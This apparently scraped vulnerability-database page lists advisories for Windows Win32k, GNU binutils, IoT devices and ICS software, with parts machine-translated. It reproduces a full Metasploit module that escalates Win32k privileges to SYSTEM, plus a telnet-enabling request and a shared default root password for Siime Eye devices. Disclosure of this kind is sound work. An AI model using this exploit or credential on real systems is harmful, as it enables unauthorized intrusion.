VARIoT IoT vulnerabilities database

Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软（Microsoft）公司的一个用于Windows多用户管理的系统文件. Microsoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响：Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k' def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets. }, 'License' => MSF_LICENSE, 'Author' => [ # CVE-2021-1732 'BITTER APT', # exploit as used in the wild 'JinQuan', # detailed analysis 'MaDongZe', # detailed analysis 'TuXiaoYi', # detailed analysis 'LiHao', # detailed analysis # CVE-2022-21882 'L4ys', # github poc # both CVEs 'KaLendsi', # github pocs # Metasploit exploit 'Spencer McIntyre' # metasploit module ], 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] ], 'Payload' => { 'DisableNops' => true }, 'References' => [ # CVE-2021-1732 references [ 'CVE', '2021-1732' ], [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], # CVE-2022-21882 references [ 'CVE', '2022-21882' ], [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] ], 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS, ], 'Reliability' => [ REPEATABLE_SESSION, ], 'SideEffects' => [] } } ) ) end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Windows Build Number = #{build_num}") unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) print_error('The exploit only supports Windows 10 versions 1803 - 21H2') return CheckCode::Safe end CheckCode::Appears end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), [encoded_payload.length].pack('I<') + encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end

The business scope of Xi'an Jiaotong University Jabil Network Technology Co., Ltd. includes: computer network routers, network switches, network terminal products, network information processing products, electronic products and software. Jabil's SSLVPN management system has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

A security vulnerability has been identified in in certain HPE and Aruba L2/L3 switch firmware. A data processing error due to improper handling of an unexpected data type in user supplied information to the switch's management interface has been identified. The data processing error could be exploited to cause a crash or reboot in the switch management interface and/or possibly the switch itself leading to local denial of service (DoS). The user must have administrator privileges to exploit this vulnerability. Arubanetwork Aruba/HPE is a switch made by Arubanetwork in the United States. A large number of ports for cable connection are provided, so that star topology wiring can be adopted

There is an open race window when writing output in the following utilities in GNU binutils version 2.35 and earlier:ar, objcopy, strip, ranlib. When these utilities are run as a privileged user (presumably as part of a script updating binaries across different users), an unprivileged user can trick these utilities into getting ownership of arbitrary files through a symlink. GNU binutils There is a link interpretation vulnerability in.Information may be obtained and information may be tampered with. GNU Binutils (GNU Binary Utilities or binutils) is a set of programming language tool programs developed by the GNU community. The program is primarily designed to handle object files in various formats and provides linkers, assemblers, and other tools for object files and archives. An access control error vulnerability exists in GNU binutils that allows smart_rename() to bypass access restrictions, allowing an attacker to read or change data. Bugs fixed (https://bugzilla.redhat.com/): 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: binutils security update Advisory ID: RHSA-2021:4364-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4364 Issue date: 2021-11-09 CVE Names: CVE-2020-35448 CVE-2021-3487 CVE-2021-20197 CVE-2021-20284 ==================================================================== 1. Summary: An update for binutils is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64 3. Description: The binutils packages provide a collection of binary utilities for the manipulation of object code in various object file formats. It includes the ar, as, gprof, ld, nm, objcopy, objdump, ranlib, readelf, size, strings, strip, and addr2line utilities. Security Fix(es): * binutils: Excessive debug section size can cause excessive memory consumption in bfd's dwarf2.c read_section() (CVE-2021-3487) * binutils: Race window allows users to own arbitrary files (CVE-2021-20197) * binutils: Heap-based buffer overflow in bfd_getl_signed_32() in libbfd.c because sh_entsize is not validated in _bfd_elf_slurp_secondary_reloc_section() in elf.c (CVE-2020-35448) * binutils: Heap-based buffer overflow in _bfd_elf_slurp_secondary_reloc_section in elf.c (CVE-2021-20284) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1913743 - CVE-2021-20197 binutils: Race window allows users to own arbitrary files 1924068 - binutils debuginfo misses code for bfd functions 1930988 - Backport breaks building with LTO 1935785 - Linker garbage collection removes weak alias references (possibly "regression" of bz1804325) 1937784 - CVE-2021-20284 binutils: Heap-based buffer overflow in _bfd_elf_slurp_secondary_reloc_section in elf.c 1946518 - binutils-2.30-98 are causing go binaries to crash due to segmentation fault on aarch64 1946977 - pthread_join segfaults in stack unwinding 1947111 - CVE-2021-3487 binutils: Excessive debug section size can cause excessive memory consumption in bfd's dwarf2.c read_section() 1950478 - CVE-2020-35448 binutils: Heap-based buffer overflow in bfd_getl_signed_32() in libbfd.c because sh_entsize is not validated in _bfd_elf_slurp_secondary_reloc_section() in elf.c 1969775 - /usr/bin/ld: Dwarf Error: Offset (2487097600) greater than or equal to .debug_str size (571933). 6. Package List: Red Hat Enterprise Linux AppStream (v. 8): aarch64: binutils-debuginfo-2.30-108.el8.aarch64.rpm binutils-debugsource-2.30-108.el8.aarch64.rpm binutils-devel-2.30-108.el8.aarch64.rpm ppc64le: binutils-debuginfo-2.30-108.el8.ppc64le.rpm binutils-debugsource-2.30-108.el8.ppc64le.rpm binutils-devel-2.30-108.el8.ppc64le.rpm s390x: binutils-debuginfo-2.30-108.el8.s390x.rpm binutils-debugsource-2.30-108.el8.s390x.rpm binutils-devel-2.30-108.el8.s390x.rpm x86_64: binutils-debuginfo-2.30-108.el8.i686.rpm binutils-debuginfo-2.30-108.el8.x86_64.rpm binutils-debugsource-2.30-108.el8.i686.rpm binutils-debugsource-2.30-108.el8.x86_64.rpm binutils-devel-2.30-108.el8.i686.rpm binutils-devel-2.30-108.el8.x86_64.rpm Red Hat Enterprise Linux BaseOS (v. 8): Source: binutils-2.30-108.el8.src.rpm aarch64: binutils-2.30-108.el8.aarch64.rpm binutils-debuginfo-2.30-108.el8.aarch64.rpm binutils-debugsource-2.30-108.el8.aarch64.rpm ppc64le: binutils-2.30-108.el8.ppc64le.rpm binutils-debuginfo-2.30-108.el8.ppc64le.rpm binutils-debugsource-2.30-108.el8.ppc64le.rpm s390x: binutils-2.30-108.el8.s390x.rpm binutils-debuginfo-2.30-108.el8.s390x.rpm binutils-debugsource-2.30-108.el8.s390x.rpm x86_64: binutils-2.30-108.el8.x86_64.rpm binutils-debuginfo-2.30-108.el8.x86_64.rpm binutils-debugsource-2.30-108.el8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2020-35448 https://access.redhat.com/security/cve/CVE-2021-3487 https://access.redhat.com/security/cve/CVE-2021-20197 https://access.redhat.com/security/cve/CVE-2021-20284 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/ 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYYrcWdzjgjWX9erEAQgOuA//ddTY+J3xDL8Z+2Gi+qcbItkoW0B8nKrt hqWmx6c/KlhAtLnAbIh18N+1uPMAXGNZcKHtCJfFSIAP3B71jDBqA+CRqlhiapmg ze4qYNpUwBg0e2c/6w0V5GYhIXpdsyiKXTpjmnaxnzW61tiCCWFBZoWpzJjSId1X yR7vHjDaXT1CZl0fHS/5Y9NfK/7jjgkJv7U7wcUxEsy6bMQIzM0nMLZauVmIrsC0 vu1bhQifEJH1mnoykfnlRVSEe+qGMrEtnOCnos8GTGChmVt4bgogpb5oE4JFm+bs ufjpRwSC1X5XRv9aqTX/ixIFLCeFpZkYhFLUlZqYHNKRcRlcqz5MLFA6KYdTj9zt 2ygqd5o26ml7gVHyA+BGE/pzd5m9YTzNvrWbC/ZV6loHM1nHUIBW/Y+hneSWTCkH x1LCmTnYxyPz0ZjySbCy03SJPrRewe/xPlxJlCmqLfVh+hEvCHsSw9hnYC3+pvMB xIl5HNf34dc/lJsPXo65owsDNcTlKF7gfVG3eKjcNnu1Uh9LzCYG8PKMtougZgV3 mAviF8MhgWVLXJTo6BXtF605ivViFoyis0bFJCV6uihV+nfAesWVN3rnIeDMh2sV EA9zQyxzy2nQsDMJ4eLV5ckrl7YzGsJt+B9jwLXbGkpjQm+bCrds41k9gLjQEiHE Vm3qGf43D60+Ds -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution: For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update: https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment 5. JIRA issues fixed (https://issues.jboss.org/): LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert `FluentdNodeDown` always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding 6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202208-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNU Binutils: Multiple Vulnerabilities Date: August 14, 2022 Bugs: #778545, #792342, #829304 ID: 202208-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been discovered in Binutils, the worst of which could result in denial of service. Background ========= The GNU Binutils are a collection of tools to create, modify and analyse binary files. Many of the files use BFD, the Binary File Descriptor library, to do low-level manipulation. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 sys-devel/binutils < 2.38 >= 2.38 2 sys-libs/binutils-libs < 2.38 >= 2.38 Description ========== Multiple vulnerabilities have been discovered in GNU Binutils. Please review the CVE identifiers referenced below for details. Impact ===== Please review the referenced CVE identifiers for details. Workaround ========= There is no known workaround at this time. Resolution ========= All Binutils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-devel/binutils-2.38" All Binutils library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-libs/binutils-libs-2.38" References ========= [ 1 ] CVE-2021-3487 https://nvd.nist.gov/vuln/detail/CVE-2021-3487 [ 2 ] CVE-2021-3530 https://nvd.nist.gov/vuln/detail/CVE-2021-3530 [ 3 ] CVE-2021-3549 https://nvd.nist.gov/vuln/detail/CVE-2021-3549 [ 4 ] CVE-2021-20197 https://nvd.nist.gov/vuln/detail/CVE-2021-20197 [ 5 ] CVE-2021-20284 https://nvd.nist.gov/vuln/detail/CVE-2021-20284 [ 6 ] CVE-2021-20294 https://nvd.nist.gov/vuln/detail/CVE-2021-20294 [ 7 ] CVE-2021-45078 https://nvd.nist.gov/vuln/detail/CVE-2021-45078 Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202208-30 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5

Shenzhen Weimeng Technology Co., Ltd. is a leading domestic provider of network equipment and smart home product solutions. Its main products include wireless gateways, switches, foreign VPNs, dual-frequency ceiling-mounted APs, etc. The AC centralized management platform has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. A command injection vulnerability resides in the HOST/IP section of the NFS settings menu in the webserver running on the device. By injecting Bash commands via shell metacharacters here, the device executes arbitrary code with root privileges (all of the device's services are running as root). Svakom Siime Eye Has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Svakom ------------------------------------------ [Affected Product Code Base] Siime eye - 14.1.00000001.3.330.0.0.3.14 ------------------------------------------ [Affected Component] Siime Eye, web interface ------------------------------------------ [Attack Type] Context-dependent ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] An attacker needs to be connected to the device's access point and have access to the admin panel (e.g through sniffing or bruteforcing the credentials) ------------------------------------------ [Reference] https://www.pentestpartners.com/security-blog/vulnerable-wi-fi-dildo-camera-endoscope-yes-really/ N/A ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] true ------------------------------------------ [Discoverer] Willem Westerhof, Jasper Nota, Edwin Gozeling from Qbit cyber security in assignment for the Consumentenbond In addition, Pentest partners discovered this as well but did not request CVE's. Use CVE-2020-11920

An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. By sending a set_params.cgi?telnetd=1&save=1&reboot=1 request to the webserver, it is possible to enable the telnet interface on the device. The telnet interface can then be used to obtain access to the device with root privileges via a reecam4debug default password. This default telnet password is the same across all Siime Eye devices. In order for the attack to be exploited, an attacker must be physically close in order to connect to the device's Wi-Fi access point. Svakom Siime Eye There is a vulnerability in the initialization of resources to insecure default values.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. ------------------------------------------ [Additional Information] The vulnerability was first discovered by Pentest Partners, later on it was also discovered by Qbit as the issues remain unaddressed by the vendor. default telnet password is the same across all Siime Eye devices and possibly even across all devices created by this developer ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Svakom ------------------------------------------ [Affected Product Code Base] Siime Eye - 14.1.00000001.3.330.0.0.3.14 ------------------------------------------ [Affected Component] Siime Eye device ------------------------------------------ [Attack Type] Physical ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] An attacker must first obtain access to the Wi-Fi access point of the device, after which the exploit can be done using simple network commands. ------------------------------------------ [Reference] https://www.pentestpartners.com/security-blog/vulnerable-wi-fi-dildo-camera-endoscope-yes-really/ N/A ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] true ------------------------------------------ [Discoverer] Willem Westerhof, Jasper Nota, Edwin Gozeling from Qbit during an assignment for the Consumentenbond. Unknown personnel at pentest partners who did not request a CVE back then. Use CVE-2020-11915

NC601B is a serial server of Anhui Kanghai Times Technology Co., Ltd. An unauthorized access vulnerability exists in the NC601B web configuration page of Anhui Kanghai Times Technology Co., Ltd. Attackers can use this vulnerability to obtain critical information of the system, leading to the disclosure of sensitive information.

Nanjing Keyuan Automation Group Co., Ltd. (Stock Abbreviation: Keyuan Stock Code: 002380) was founded in 1993. It is a leading domestic supplier of industrial automation and information technology, products and solutions with more than 1,000 employees. The company successfully landed in the A-share market on March 31, 2010. Nanjing Keyuan SyncView has a binary vulnerability. Attackers can use this vulnerability to construct malformed gra files and cause the program to crash.

Shenzhen Inovance Technology Co., Ltd. focuses on the R&D, production and sales of industrial automation control products. It is positioned to serve mid- and high-end equipment manufacturers. Based on industrial automation control technology with independent intellectual property rights, it can quickly provide customers with personalized The solution is the main business model to realize the common growth of corporate value and customer value. AutoShop V4.0.5.0 timing monitor chart (TimeSequenceChart.exe) has a memory corruption vulnerability in processing timing chart files (.TSC files), and constructing malformed timing chart files can cause the program to crash. If successfully used, it can cause arbitrary code execution.

Shenzhen Inovance Technology Co., Ltd. focuses on the R&D, production and sales of industrial automation control products. It is positioned to serve mid- and high-end equipment manufacturers. Based on industrial automation control technology with independent intellectual property rights, it can quickly provide customers with personalized The solution is the main business model to realize the common growth of corporate value and customer value. InoTouch Editor V2.6.8 has a binary vulnerability, which can be exploited by attackers to construct malformed formula files and cause the program to crash.

Spectranet 4G LTE Mobile Router is a mobile router. Spectranet 4G LTE Mobile Router has logic flaws. Attackers can use vulnerabilities to obtain sensitive information, make arbitrary changes to the configuration, and execute restart commands without authorization.

There is a denial of service (DoS) vulnerability in eCNS280 versions V100R005C00, V100R005C10. Due to a design defect, remote unauthorized attackers send a large number of specific messages to affected devices, causing system resource exhaustion and web application DoS. Huawei eCNS280 is the core network equipment of China's Huawei (Huawei) wireless broadband trunking system. In addition to providing the network functions of the traditional core network, it also provides capacity configuration for each network element according to the actual application by virtualizing the network element functions and sharing standardized hardware resources among multiple network elements, which improves the efficiency of network expansion and reduction. The vulnerability is due to a design flaw

There is a use after free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module may refer to some memory after it has been freed while dealing with some messages. Attackers can exploit this vulnerability by sending specific message to the affected module. This may lead to module crash, compromising normal service. Taurus-AL00A Is vulnerable to the use of freed memory.Denial of service (DoS) It may be put into a state

There is an information leak vulnerability in eCNS280_TD versions V100R005C00 and V100R005C10. A command does not have timeout exit mechanism. Temporary file contains sensitive information. This allows attackers to obtain information by inter-process access that requires other methods. eCNS280_TD Contains a vulnerability in the plaintext storage of important information.Information may be obtained. Huawei eCNS280 is the core network equipment of China's Huawei (Huawei) wireless broadband trunking system. In addition to providing the network functions of the traditional core network, it also provides capacity configuration for each network element according to the actual application by virtualizing the network element functions and sharing standardized hardware resources among multiple network elements, which improves the efficiency of network expansion and reduction. No detailed vulnerability details are currently provided

Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error. ASUSWRT ASUS RT-AX3000 There is an unspecified vulnerability in the firmware.Denial of service (DoS) It may be put into a state. ASUS RT-AX3000 is a piece of firmware from ASUS, Taiwan, China that runs in its routers

There is an insufficient integrity check vulnerability in Huawei Sound X Product. The system does not check certain software package's integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package to the device. Affected product versions include:AIS-BW80H-00 versions 9.0.3.1(H100SP13C00),9.0.3.1(H100SP18C00),9.0.3.1(H100SP3C00),9.0.3.1(H100SP9C00),9.0.3.2(H100SP1C00),9.0.3.2(H100SP2C00),9.0.3.2(H100SP5C00),9.0.3.2(H100SP8C00),9.0.3.3(H100SP1C00). AIS-BW80H-00 Exists in a data integrity verification vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. The Huawei AIS-BW80H-00 is a smart speaker device from the Chinese company Huawei

A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation. This issue is fixed in watchOS 7.2, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, iOS 14.3 and iPadOS 14.3, tvOS 14.3. Processing a maliciously crafted font file may lead to arbitrary code execution. plural Apple The product contains a vulnerability related to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple macOS is a set of dedicated operating systems developed by Apple Corporation for Mac computers

An insufficient session expiration vulnerability in FortiNet's FortiIsolator version 2.0.1 and below may allow an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID (via other, hypothetical attacks). FortiNet FortiIsolator Is vulnerable to a session expiration.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Fortinet FortiIsolator is an application provided by Fortinet Corporation of the United States to provide remote security isolation functions for browsers. The application adds additional advanced threat protection to the Fortinet Security Fabric and protects critical business data from sophisticated threats on the network. Content and files from the web are accessed in remote containers, which then present risk-free content to users

An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated, remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points. FortiWeb GUI A cross-site scripting vulnerability exists in the interface.Information may be obtained and information may be tampered with. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content